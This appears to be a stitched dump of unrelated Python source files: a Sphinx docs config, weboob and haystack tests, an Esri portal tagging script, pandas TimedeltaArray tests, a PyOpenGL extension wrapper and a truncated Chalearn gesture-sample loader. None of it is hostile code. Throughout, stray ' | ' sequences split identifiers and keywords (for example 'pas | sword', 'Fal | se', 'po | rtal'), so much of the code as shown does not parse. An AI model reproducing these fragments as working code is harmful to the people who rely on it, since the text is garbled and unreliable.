# to retrieve scikit criteria metadata
os.environ["SKCRITERIA_IN_SETUP"] = "True"
import skcriteria
# modules to mock in readthedocs
MOCK_MODULES = []
#~ ["numpy", "scipy",
#~ "matplotlib", "matplotlib.pyplot",
#~ "matplotlib.cm", "matplotlib.patches",
#~ "matplotlib.spines", "matplotlib.projections.polar",
#~ "matplotlib.projections", "matplotlib.path"]
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.mathjax',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'sphinx.ext.autosummary',
'numpydoc',
'nbsphinx']
numpydoc_class_members_toctree = False
nbsphinx_execute = 'always'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = skcriteria.NAME
copyright = u'2015-2016-2017-2018, Juan B. Cabral - Nadia A. Luczywo'
author = u'Juan BC'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = skcriteria.VERSION
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['**.ipynb_checkpoints']
# The name of the Pygments (syntax highlighting) style to use.
pygments | _style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ------------------------------------- | ---------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
if on_rtd:
from mock import Mock as MagicMock
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return Mock()
sys.modules.update((mod_name, Mock()) for mod_name in MOCK_MODULES)
else: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
html_favicon = "_static/favicon.ico"
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
'**': [
'about.html',
'navigation.html',
'relations.html', # needs 'show_related': True theme option to display
'searchbox.html',
'donate.html',
]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'Scikit-Criteriadoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Scikit-Criteria.tex', u'Scikit-Criteria Documentation',
u'Juan BC', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'scikit-criteria', u'Scikit-Criteria Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Scikit-Criteria', u'Scikit-Criteria Documentation',
author, 'Scikit-Criteria', 'One line description of project.',
'Miscellaneous'),
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
def setup(app):
app.add_stylesheet('css/skcriteria.css')
app.add_javascript('js/skcriteria.js')
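# Hedged build example (paths assume the doc/source layout implied by the
# sys.path setup at the top of this file; run from the repository root):
# sphinx-build -b html doc/source doc/build/html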
|
vicnet/weboob | modules/presseurop/test.py | Python | lgpl-3.0 | 1,158 | 0 | # -*- coding: utf-8 -*-
# Copyright(C) 2012 Florent Fourcot
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along | with this weboob module | . If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.test import BackendTest
from weboob.tools.value import Value
class PresseuropTest(BackendTest):
MODULE = 'presseurop'
def setUp(self):
if not self.is_backend_configured():
self.backend.config['lang'] = Value(value='fr')
def test_new_messages(self):
for message in self.backend.iter_unread_messages():
pass
|
Esri/ops-server-config | Publish/Portal/PrepItemsForExtract.py | Python | apache-2.0 | 5,238 | 0.007064 | #!/usr/bin/env python
#------------------------------------------------------------------------------
# Copyright 2015 Esri
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#==============================================================================
#Name: PrepItemsForExtract.py
#
#Purpose: Prepare portal items for extract:
# - Add "Hosted Service" tag to hosted service items
#
#==============================================================================
import sys
import os
import traceback
import logging
from portalpy import Portal
from FindOrphanedHostedServices import get_hosted_service_items
logging.basicConfig()
def format_hosted_item_info(item):
itemID = item.get('id')
itemTitle = item.get('title')
itemOwner = item.get('owner')
itemType = item.get('type')
itemURL = item.get('url')
service = itemURL.split('/Hosted/')[1]
return "Id: {:<34}Owner: {:<22}Type: {:<17}URL: {:<50}Title: {:<30}".format(
itemID, itemOwner, itemType, service, itemTitle)
def format_item_info(item):
itemID = item.get('id')
itemTitle = item.get('title')
itemOwner = item.get('owner')
itemType = item.get('type')
return "Id: {:<34}Owner: {:<25}Type: {:25}Title: {:<40}".format(
itemID, itemOwner, itemType, itemTitle)
def print_args():
""" Print script arguments """
if len(sys.argv) < 4:
print '\n' + os.path.basename(sys.argv[0]) + \
' <PortalURL>' \
' <AdminUser>' \
' <AdminUserPassword>'
print '\nWhere:'
print '\n\t<PortalURL> (required): URL of Portal ' \
'(i.e. https://fully_qualified_domain_name/arcgis)'
print '\n\t<AdminUser> (required): Primary portal administrator user.'
print '\n\t<AdminUserPassword> (required): Password for AdminUser.'
return None
else:
# Set variables from parameter values
portal_address = sys.argv[1]
adminuser = sys.argv[2]
password = sys.argv[3]
return portal_address, adminuser, password
def main():
exit_err_code = 1
# Print/get script arguments
results = print_args()
if not results:
sys.exit(exit_err_code)
portal_address, adminuser, pas | sword = results
total_success = True
title_break_count = 100
section_break_count = 75
search_query = None
print '=' * title_break_count
print 'Prepare Items for Extract'
print '=' * title_break_count
try:
portal = Portal(portal_address, adminuser, password)
items = po | rtal.search(q=search_query, sort_field='owner')
# ---------------------------------------------------------------------
# Prepare hosted service items
# ---------------------------------------------------------------------
# Add new tag to hosted service so we can identify the original
# hosted service after the portal items are published to a new portal
new_tags = ['Hosted Service']
print '\n{}'.format('-' * section_break_count)
print '- Prepare Hosted Service Items (Add tags: {})...'.format(', '.join(new_tags))
items_to_prep = get_hosted_service_items(portal, items)
for item_to_prep in items_to_prep:
print '\n {}'.format(format_hosted_item_info(item_to_prep))
tags = item_to_prep.get('tags')
for new_tag in new_tags:
if new_tag not in tags:
tags.append(new_tag)
# NOTE: have to pass new tags as string and not as a list
resp = portal.update_item(item_to_prep['id'], {'tags':', '.join(tags)})
if not resp:
print '***ERROR encountered during "update_item".'
total_success = False
except:
total_success = False
# Get the traceback object
tb = sys.exc_info()[2]
tbinfo = traceback.format_tb(tb)[0]
# Concatenate information together concerning the error
# into a message string
pymsg = "PYTHON ERRORS:\nTraceback info:\n" + tbinfo + \
"\nError Info:\n" + str(sys.exc_info()[1])
# Print Python error messages for use in Python / Python Window
print
print "***** ERROR ENCOUNTERED *****"
print pymsg + "\n"
finally:
print '\nDone.'
if total_success:
sys.exit(0)
else:
sys.exit(exit_err_code)
if __name__ == "__main__":
main()
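# Example invocation, matching the arguments documented in print_args()
# (URL and credentials are placeholders):
# python PrepItemsForExtract.py https://portal.example.com/arcgis admin <password>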
|
trolldbois/python-haystack | test/haystack/test_utils.py | Python | gpl-3.0 | 12,507 | 0.000959 | # -*- coding: utf-8 -*-
"""Tests haystack.utils ."""
import haystack.model
# init ctypes with a controlled type size
import ctypes
import logging
import unittest
import os
from haystack import model
from haystack import utils
from haystack import types
from haystack import target
from haystack.mappings.process import make_process_memory_handler, make_local_memory_handler
class TestHelpers(unittest.TestCase):
"""Tests helpers functions."""
def setUp(self):
pass
def tearDown(self):
pass
def test_is_address_local(self):
my_target = target.TargetPlatform.make_target_platform | _local()
my_ctypes = my_target.get_target_ctype | s()
my_utils = my_target.get_target_ctypes_utils()
ctypes5_gen64 = haystack.model.import_module_for_target_ctypes("test.src.ctypes5_gen64", my_ctypes)
# kinda chicken and egg here...
# one call
mappings = make_local_memory_handler()
m = mappings.get_mappings()[0]
# struct a - basic types
s = ctypes.sizeof(ctypes5_gen64.struct_a)
a = ctypes5_gen64.struct_a.from_address(m.start)
pa = my_ctypes.c_void_p(m.start)
ptr_a = my_ctypes.POINTER(ctypes5_gen64.struct_a)(a)
b = ctypes5_gen64.struct_a.from_address(m.end - s)
pb = my_ctypes.c_void_p(m.end - s)
ptr_b = my_ctypes.POINTER(ctypes5_gen64.struct_a)(b)
c = ctypes5_gen64.struct_a.from_address(m.end - 1)
pc = my_ctypes.c_void_p(m.end - 1)
ptr_c = my_ctypes.POINTER(ctypes5_gen64.struct_a)(c)
self.assertTrue(my_utils.is_address_local(pa, structType=None))
self.assertTrue(
my_utils.is_address_local(
pa,
structType=ctypes5_gen64.struct_a))
self.assertTrue(my_utils.is_address_local(ptr_a, structType=None))
self.assertTrue(
my_utils.is_address_local(
ptr_a,
structType=ctypes5_gen64.struct_a))
self.assertTrue(my_utils.is_address_local(pb, structType=None))
self.assertTrue(
my_utils.is_address_local(
pb,
structType=ctypes5_gen64.struct_a))
self.assertTrue(my_utils.is_address_local(ptr_b, structType=None))
self.assertTrue(
my_utils.is_address_local(
ptr_b,
structType=ctypes5_gen64.struct_a))
self.assertTrue(my_utils.is_address_local(pc, structType=None))
self.assertFalse(
my_utils.is_address_local(
pc,
structType=ctypes5_gen64.struct_a))
self.assertTrue(my_utils.is_address_local(ptr_c, structType=None))
self.assertFalse(
my_utils.is_address_local(
ptr_c,
structType=ctypes5_gen64.struct_a))
def test_pointer2bytes(self):
my_target = target.TargetPlatform.make_target_platform_local()
my_ctypes = my_target.get_target_ctypes()
my_utils = my_target.get_target_ctypes_utils()
class X(my_ctypes.Structure):
_fields_ = [('a', my_ctypes.c_long)]
nb = 3
x = (nb * X)()
x[2].a = 42
ptr = my_ctypes.POINTER(X)(x[0])
bytes_x = my_utils.pointer2bytes(ptr, nb)
self.assertEqual(len(bytes_x), my_ctypes.sizeof(x))
self.assertEqual(
bytes_x,
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00*\x00\x00\x00\x00\x00\x00\x00')
pass
def test_formatAddress(self):
my_utils64 = utils.Utils(types.build_ctypes_proxy(8, 8, 16))
my_utils32 = utils.Utils(types.build_ctypes_proxy(4, 4, 8))
x = my_utils64.formatAddress(0x12345678)
self.assertEqual('0x0000000012345678', x)
# 32b
x = my_utils32.formatAddress(0x12345678)
self.assertEqual('0x12345678', x)
def test_unpackWord(self):
# 64b
my_utils = utils.Utils(types.build_ctypes_proxy(8, 8, 16))
one = b'\x01' + 7 * b'\x00'
x = my_utils.unpackWord(one)
self.assertEqual(x, 1)
# 32b
my_utils = utils.Utils(types.build_ctypes_proxy(4, 4, 8))
one32 = b'\x01' + 3 * b'\x00'
x = my_utils.unpackWord(one32)
self.assertEqual(x, 1)
pass
# endianness
two32 = 3 * b'\x00' + b'\x02'
x = my_utils.unpackWord(two32, '>')
self.assertEqual(x, 2)
pass
def test_get_pointee_address(self):
"""tests get_pointee_address on host ctypes POINTER and haystack POINTER"""
my_ctypes = types.build_ctypes_proxy(8, 8, 16)
my_utils = utils.Utils(my_ctypes)
class X(my_ctypes.Structure):
_pack_ = True
_fields_ = [('a', my_ctypes.c_long),
('p', my_ctypes.POINTER(my_ctypes.c_int)),
('b', my_ctypes.c_ubyte)]
self.assertEqual(my_ctypes.sizeof(X), 17)
i = X.from_buffer_copy(b'\xAA\xAA\xBB\xBB' + 4 * b'\xBB' + 8 * b'\x11' + b'\xCC')
a = my_utils.get_pointee_address(i.p)
self.assertEqual(my_ctypes.sizeof(i.p), 8)
self.assertNotEquals(a, 0)
self.assertEqual(a, 0x1111111111111111) # 8*'\x11'
# null pointer
i = X.from_buffer_copy(b'\xAA\xAA\xBB\xBB' + 4 * b'\xBB' + 8 * b'\x00' + b'\xCC')
pnull = my_utils.get_pointee_address(i.p)
self.assertEqual(my_utils.get_pointee_address(pnull), 0)
# change arch, and retry
my_ctypes = types.build_ctypes_proxy(4, 4, 8)
class Y(my_ctypes.Structure):
_pack_ = True
_fields_ = [('a', my_ctypes.c_long),
('p', my_ctypes.POINTER(my_ctypes.c_int)),
('b', my_ctypes.c_ubyte)]
self.assertEqual(my_ctypes.sizeof(Y), 9)
i = Y.from_buffer_copy(b'\xAA\xAA\xBB\xBB' + 4 * b'\x11' + b'\xCC')
a = my_utils.get_pointee_address(i.p)
self.assertEqual(my_ctypes.sizeof(i.p), 4)
self.assertNotEquals(a, 0)
self.assertEqual(a, 0x11111111) # 4*'\x11'
# null pointer
i = Y.from_buffer_copy(b'\xAA\xAA\xBB\xBB' + 4 * b'\x00' + b'\xCC')
pnull = my_utils.get_pointee_address(i.p)
self.assertEqual(my_utils.get_pointee_address(pnull), 0)
# non-pointer, and void null pointer
my_ctypes = types.load_ctypes_default()
i = my_ctypes.c_int(69)
self.assertEqual(my_utils.get_pointee_address(i), 0)
pnull = my_ctypes.c_void_p(0)
self.assertEqual(my_utils.get_pointee_address(pnull), 0)
pass
def test_offsetof(self):
"""returns the offset of a member fields in a record"""
my_ctypes = types.build_ctypes_proxy(4, 4, 8)
my_utils = utils.Utils(my_ctypes)
class Y(my_ctypes.Structure):
_pack_ = True
_fields_ = [('a', my_ctypes.c_long),
('p', my_ctypes.POINTER(my_ctypes.c_int)),
('b', my_ctypes.c_ubyte)]
o = my_utils.offsetof(Y, 'b')
self.assertEqual(o, 8)
my_ctypes = types.build_ctypes_proxy(8, 8, 16)
my_utils = utils.Utils(my_ctypes)
class X(my_ctypes.Structure):
_pack_ = True
_fields_ = [('a', my_ctypes.c_long),
('p', my_ctypes.POINTER(my_ctypes.c_int)),
('b', my_ctypes.c_ubyte)]
o = my_utils.offsetof(X, 'b')
self.assertEqual(o, 16)
class X2(my_ctypes.Union):
_pack_ = True
_fields_ = [('a', my_ctypes.c_long),
('p', my_ctypes.POINTER(my_ctypes.c_int)),
('b', my_ctypes.c_ubyte)]
o = my_utils.offsetof(X2, 'b')
self.assertEqual(o, 0)
pass
def test_container_of(self):
"""From a pointer to a member, returns the parent struct"""
# depends on offsetof
my_ctypes = types.build_ctypes_proxy(8, 8, 16)
my_utils = utils.Utils(my_ctypes)
jreback/pandas | pandas/tests/arrays/test_timedeltas.py | Python | bsd-3-clause | 12,380 | 0.000889 | import numpy as np
import pytest
import pandas as pd
from pandas import Timedelta
import pandas._testing as tm
from pandas.core import nanops
from pandas.core.arrays import TimedeltaArray
class TestTimedeltaArrayConstructor:
def test_only_1dim_accepted(self):
# GH#25282
arr = np.array([0, 1, 2, 3], dtype="m8[h]").astype("m8[ns]")
with pytest.raises(ValueError, match="Only 1-dimensional"):
# 3-dim, we allow 2D to sneak in for ops purposes GH#29853
TimedeltaArray(arr.reshape(2, 2, 1))
with pytest.raises(ValueError, match="Only 1-dimensional"):
# 0-dim
TimedeltaArray(arr[[0]].squeeze())
def test_freq_validation(self):
# ensure that the public constructor cannot create an invalid instance
arr = np.array([0, 0, 1], dtype=np.int64) * 3600 * 10 ** 9
msg = (
"Inferred frequency None from passed values does not "
"conform to passed frequency D"
)
with pytest.raises(ValueError, match=msg):
TimedeltaArray(arr.view("timedelta64[ns]"), freq="D")
def test_non_array_raises(self):
with pytest.raises(ValueError, match="list"):
TimedeltaArray([1, 2, 3])
def test_other_type_raises(self):
with pytest.raises(ValueError, match="dtype bool cannot be converted"):
TimedeltaArray(np.array([1, 2, 3], dtype="bool"))
def test_incorrect_dtype_raises(self):
# TODO: why TypeError for 'category' but ValueError for i8?
with pytest.raises(
ValueError, match=r"category cannot be converted to timedelta64\[ns\]"
):
TimedeltaArray(np.array([1, 2, 3], dtype="i8"), dtype="category")
with pytest.raises(
ValueError, match=r"dtype int64 cannot be converted to timedelta64\[ns\]"
):
TimedeltaArray(np.array([1, 2, 3], dtype="i8"), dtype=np.dtype("int64"))
def test_copy(self):
data = np.array([1, 2, 3], dtype="m8[ns]")
arr = TimedeltaArray(data, copy=False)
assert arr._data is data
arr = TimedeltaArray(data, copy=True)
assert arr._data is not data
assert arr._data.base is not data
class TestTimedeltaArray:
# TODO: de-duplicate with test_npsum below
def test_np_sum(self):
# GH#25282
vals = np.arange(5, dtype=np.int64).view("m8[h]").astype("m8[ns]")
arr = TimedeltaArray(vals)
result = np.sum(arr)
assert result == vals.sum()
result = np.sum(pd.TimedeltaIndex(arr))
assert result == vals.sum()
def test_from_sequence_dtype(self):
msg = "dtype .*object.* cannot be converted to timedelta64"
with pytest.raises(ValueError, match=msg):
TimedeltaArray._from_sequence([], dtype=object)
@pytest.mark.parametrize("dtype", [int, np.int32, np.int64, "uint32", "uint64"])
def test_astype_int(self, dtype):
arr = TimedeltaArray._from_sequence([Timedelta("1H"), Timedelta("2H")])
with tm.assert_produces_warning(FutureWarning):
# astype(int..) deprecated
result = arr.astype(dtype)
if np.dtype(dtype).kind == "u":
expected_dtype = np.dtype("uint64")
else:
expected_dtype = np.dtype("int64")
with tm.assert_produces_warning(FutureWarning):
# astype(int..) deprecated
expected = arr.astype(expected_dtype)
assert result.dtype == expected_dtype
tm.assert_numpy_array_equal(result, expected)
def test_setitem_clears_freq(self):
a = TimedeltaArray(pd.timedelta_range("1H", periods=2, freq="H"))
a[0] = Timedelta("1H")
assert a.freq is None
@pytest.mark.parametrize(
"obj",
[
Timedelta(seconds=1),
Timedelta(seconds=1).to_timedelta64(),
Timedelta(seconds=1).to_pytimedelta(),
],
)
def test_setitem_objects(self, obj):
# make sure we accept timedelta64 and timedelta in addition to Timedelta
tdi = pd.timedelta_range("2 Days", periods=4, freq="H")
arr = TimedeltaArray(tdi, freq=tdi.freq)
arr[0] = obj
assert arr[0] == Timedelta(seconds=1)
@pytest.mark.parametrize(
"other",
[
1,
np.int64(1),
1.0,
np.datetime64("NaT"),
pd.Timestamp.now(),
"invalid",
np.arange(10, dtype="i8") * 24 * 3600 * 10 ** 9,
(np.arange(10) * 24 * 3600 * 10 ** 9).view("datetime64[ns]"),
pd.Timestamp.now().to_period("D"),
],
)
@pytest.mark.parametrize("index", [True, False])
def test_searchsorted_invalid_types(self, other, index):
data = np.arange(10, dtype="i8") * 24 * 3600 * 10 ** 9
arr = TimedeltaArray(data, freq="D")
if index:
arr = pd.Index(arr)
msg = "|".join(
[
"searchsorted requires compatible dtype or scalar",
"value should be a 'Timedelta', 'NaT', or array of those. Got",
]
)
with pytest.raises(TypeError, match=msg):
arr.searchsorted(other)
class TestUnaryOps:
def test_abs(self):
vals = np.array([-3600 * 10 ** 9, "NaT", 7200 * 10 ** 9], dtype="m8[ns]")
arr = TimedeltaArray(vals)
evals = np.array([3600 * 10 ** 9, "NaT", 7200 * 10 ** 9], dtype="m8[ns]")
expected = TimedeltaArray(evals)
result = abs(arr)
tm.assert_timedelta_array_equal(result, expected)
def test_neg(self):
vals = np.array([-3600 * 10 ** 9, "NaT", 7200 * 10 ** 9], dtype="m8[ns]")
arr = TimedeltaArray(vals)
evals = np.array([3600 * 10 ** 9, "NaT", -7200 * 10 ** 9], dtype="m8[ns]")
expected = TimedeltaArray(evals)
result = -arr
tm.assert_timedelta_array_equal(result, expected)
def test_neg_freq(self):
tdi = pd.timedelta_range("2 Days", periods=4, freq="H")
arr = TimedeltaArray(tdi, freq=tdi.freq)
expected = TimedeltaArray(-tdi._data, freq=-tdi.freq)
result = -arr
tm.assert_timedelta_array_equal(result, expected)
class TestReductions:
@pytest.mark.parametrize("name", ["std", "min", "max", "median", "mean"])
@pytest.mark.parametrize("skipna", [True, False])
def test_reductions_empty(self, name, skipna):
tdi = pd.TimedeltaIndex([])
arr = tdi.array
result = getattr(tdi, name)(skipna=skipna)
assert result is pd.NaT
result = getattr(arr, name)(skipna=skipna)
assert result is pd.NaT
@pytest.mark.parametrize("skipna", [True, Fal | se])
def test_sum_empty(self, skipna):
tdi = pd.TimedeltaIndex([])
arr = tdi.array
result = tdi.sum(skipna=skipna)
assert isinstance(result, Timedelta)
assert result == Timedelta(0)
result = arr.sum(skipna=skipna)
assert isinstance(result, Timedelta)
assert result == Timedelta(0)
def test_min_max(self):
arr = | TimedeltaArray._from_sequence(["3H", "3H", "NaT", "2H", "5H", "4H"])
result = arr.min()
expected = Timedelta("2H")
assert result == expected
result = arr.max()
expected = Timedelta("5H")
assert result == expected
result = arr.min(skipna=False)
assert result is pd.NaT
result = arr.max(skipna=False)
assert result is pd.NaT
def test_sum(self):
tdi = pd.TimedeltaIndex(["3H", "3H", "NaT", "2H", "5H", "4H"])
arr = tdi.array
result = arr.sum(skipna=True)
expected = Timedelta(hours=17)
assert isinstance(result, Timedelta)
assert result == expected
result = tdi.sum(skipna=True)
assert isinstance(result, Timedelta)
assert result == expected
result = arr.sum(skipna=False)
assert result is pd.NaT
result = tdi.sum(skipna=False)
assert result is pd.NaT
result = arr.sum(min_count=9)
assert result is pd.NaT
result = tdi.sum(min_count=9)
assert result is pd.NaT
D4wN/brickv | src/build_data/windows/OpenGL/GL/ARB/fragment_program.py | Python | gpl-2.0 | 3,247 | 0.028334 | '''OpenGL extension ARB.fragment_program
This module customises the behaviour of the
OpenGL.raw.GL.ARB.fragment_program to provide a more
Python-friendly API
Overview (from the spec)
Unextended OpenGL mandates a certain set of configurable per-
fragment computations defining texture application, texture
environment, color sum, and fog operations. Several extensions have
added further per-fragment computations to OpenGL. For example,
extensions have defined new texture environment capabilities
(ARB_texture_env_add, ARB_texture_env_combine, ARB_texture_env_dot3,
ARB_texture_env_crossbar), per-fragment depth comparisons
(ARB_depth_texture, ARB_shadow, ARB_shadow_ambient,
EXT_shadow_funcs), per-fragment lighting (EXT_fragment_lighting,
EXT_light_texture), and environment mapped bump mapping
(ATI_envmap_bumpmap).
Each such extensi | on adds a small set of relatively inflexible per-
fragment computations.
This inflexibility is in contrast to the typical flexibility
provided by the underlying programmable floating point engines
(whether micro-coded fragment engines, DSPs, or CPUs) that are
traditionally used to implement OpenGL's texturing computations.
The purpose of this extension is to expose to the OpenGL application
writer a significant degree of per-fragment programmability for
computing fragm | ent parameters.
For the purposes of discussing this extension, a fragment program is
a sequence of floating-point 4-component vector operations that
determines how a set of program parameters (not specific to an
individual fragment) and an input set of per-fragment parameters are
transformed to a set of per-fragment result parameters.
The per-fragment computations for standard OpenGL given a particular
set of texture and fog application modes (along with any state for
extensions defining per-fragment computations) is, in essence, a
fragment program. However, the sequence of operations is defined
implicitly by the current OpenGL state settings rather than defined
explicitly as a sequence of instructions.
This extension provides an explicit mechanism for defining fragment
program instruction sequences for application-defined fragment
programs. In order to define such fragment programs, this extension
defines a fragment programming model including a floating-point
4-component vector instruction set and a relatively large set of
floating-point 4-component registers.
The extension's fragment programming model is designed for efficient
hardware implementation and to support a wide variety of fragment
programs. By design, the entire set of existing fragment programs
defined by existing OpenGL per-fragment computation extensions can
be implemented using the extension's fragment programming model.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ARB/fragment_program.txt
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.ARB.fragment_program import *
### END AUTOGENERATED SECTION
from OpenGL.GL import glget
glget.addGLGetConstant( GL_FRAGMENT_PROGRAM_ARB, (1,) ) |
xiawei0000/Kinectforactiondetect | ChalearnLAPSample.py | Python | mit | 41,779 | 0.017329 | # coding=gbk
#-------------------------------------------------------------------------------
# Name: Chalearn LAP sample
# Purpose: Provide easy access to Chalearn LAP challenge data samples
#
# Author: Xavier Baro
#
# Created: 21/01/2014
# Copyright: (c) Xavier Baro 2014
# Licence: <your licence>
#-------------------------------------------------------------------------------
import os
import zipfile
import shutil
import cv2
import numpy
import csv
from PIL import Image, ImageDraw
from scipy.misc import imresize
class Skeleton(object):
""" Class that represents the skeleton information """
"""¹Ç¼ÜÀ࣬ÊäÈë¹Ç¼ÜÊý¾Ý£¬½¨Á¢Àà"""
#define a class to encode skeleton data
def __init__(self,data):
""" Constructor. Reads skeleton information from given raw data """
# Create an object from raw data
self.joins = dict()
pos = 0
# Each joint is encoded as 9 consecutive values: 3 world coordinates,
# 4 orientation-quaternion components and 2 pixel coordinates.
joint_names = ['HipCenter', 'Spine', 'ShoulderCenter', 'Head',
               'ShoulderLeft', 'ElbowLeft', 'WristLeft', 'HandLeft',
               'ShoulderRight', 'ElbowRight', 'WristRight', 'HandRight',
               'HipLeft', 'KneeLeft', 'AnkleLeft', 'FootLeft',
               'HipRight', 'KneeRight', 'AnkleRight', 'FootRight']
for name in joint_names:
    self.joins[name] = (map(float, data[pos:pos + 3]),
                        map(float, data[pos + 3:pos + 7]),
                        map(int, data[pos + 7:pos + 9]))
    pos = pos + 9
def getAllData(self):
""" Return a dictionary with all the information for each skeleton node """
return self.joins
def getWorldCoordinates(self):
""" Get World coordinates for each skeleton node """
skel=dict()
for key in self.joins.keys():
skel[key]=self.joins[key][0]
return skel
def getJoinOrientations(self):
""" Get orientations of all skeleton nodes """
skel=dict()
for key in self.joins.keys():
skel[key]=self.joins[key][1]
return skel
def getPixelCoordinates(self):
""" Get Pixel coordinates for each skeleton node """
skel=dict()
for key in self.joins.keys():
skel[key]=self.joins[key][2]
return skel
def toImage(self,width,height,bgColor):
""" Create an image for the skeleton information """
SkeletonConnectionMap = (['HipCenter','Spine'],['Spine','ShoulderCenter'],['ShoulderCenter','Head'],['ShoulderCenter','ShoulderLeft'], \
['ShoulderLeft','ElbowLeft'],['ElbowLeft','WristLeft'],['WristLeft','HandLeft'],['ShoulderCenter','ShoulderRight'], \
['ShoulderRight','ElbowRight'],['ElbowRight','WristRight'],['WristRight','HandRight'],['HipCenter','HipRight'], \
['HipRight','KneeRight'],['KneeRight','AnkleRight'],['AnkleRight','FootRight'],['HipCenter','HipLeft'], \
['HipLeft','KneeLeft'],['KneeLeft','AnkleLeft'],['AnkleLeft','FootLeft'])
im = Image.new('RGB', (width, height), bgColor)
draw = ImageDraw.Draw(im)
for link in SkeletonConnectionMap:
p=self.getPixelCoordinates()[link[1]]
p.extend(self.getPixelCoordinates()[link[0]])
draw.line(p, fill=(255,0,0), width=5)
for node in self.getPixelCoordinates().keys():
p=self.getPixelCoordinates()[node]
r=5
draw.ellipse((p[0]-r,p[1]-r,p[0]+r,p[1]+r),fill=(0,0,255))
del draw
image = numpy.array(im)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
return image
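# Hypothetical usage sketch (the CSV row layout follows the constructor above:
# 20 joints x 9 values per skeleton row; the file name is illustrative):
# with open('Sample0001_skeleton.csv', 'rb') as f:
#     row = next(csv.reader(f))
# skel = Skeleton(row)
# img = skel.toImage(640, 480, (255, 255, 255))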
## Gesture data class: takes a sample path and builds the gesture data object
class GestureSample(object):
""" Class that allows to access all the information for a certain gesture database sample """
#define class to access gesture data samples
# Initialization: read (and if necessary unzip) the sample file
def __init__ (self,fileName):
""" Constructor. Read the sample file and unzip it if it is necessary. All the data is loaded.
sample=GestureSample('Sample0001.zip')
"""
# Check the given file
if not os.path.exists(fileName): #or not os.path.isfile(fileName):
raise Exception("Sample path does not exist: " + fileName)
# Prepare sample information
self.fullFile = fileName
self.dataPath = os.path.split(fileName)[0]
self.file=os.path.split(fileName)[1]
self.seqID=os.path.splitext(self.file)[0]
self.samplePath=self.dataPath + os.path.sep + self.seqID;
# Check whether the sample is a zip archive or an unpacked directory
# Unzip sample if it is necessary
if os.path.isdir(self.samplePath) :
self.unzip = False
else:
self.unzip = True
zipFile=zipfile.ZipFile(self.fullFile,"r")
zipFile.extractall(self.samplePath)
# Open video access for RGB information
rgbVideoPath=self.samplePath + os.path.sep + self.seqID + '_color.mp4'
if not os.path.exists(rgbVideoPath):
raise Exception("Invalid sample file. RGB data is not available")
self.rgb = cv2.VideoCapture(rgbVideoPath)
while not self.rgb.isOpened():
